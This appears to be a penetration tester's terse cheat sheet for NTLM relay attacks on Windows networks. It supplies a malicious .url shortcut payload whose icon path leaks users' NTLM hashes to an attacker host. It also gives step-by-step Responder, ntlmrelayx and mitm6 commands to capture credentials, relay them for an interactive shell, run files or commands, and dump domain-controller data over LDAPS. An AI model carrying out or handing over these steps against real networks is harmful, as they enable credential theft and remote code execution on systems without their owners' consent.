-
Payload file:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\x.x.x.x%USERNAME%.icon
IconIndex=1 -
Rename file: @payload
Additional resources and techniques: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini
- Update responder config: nano -w /etc/responder/Responder.conf, turn off SMB and HTTP.
- Run responder: responder -I eth0 -rdwv
- Opennew tab and run ntlmrelayx.py -tf [file with IP] -smb2support
- Interactive shell: ntlmrelayx.py -tf [file with IP] -smb2support -i Clarify: list shares and use $[share name]
- Execute file: ntlmrelayx.py -tf [file with IP] -smb2support -e [filename]
- Execute command: ntlmrelayx.py -tf [file with IP] -smb2support -c "whoami"
- Install https://github.com/dirkjanm/mitm6.git
- Run mitm6 -d [domain name]
- Open new tab and run: ntlmrelayx.py -6 -t ldaps://[DC ip] -wh fakewpad.domain_name.local -l loot
Resource for read: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack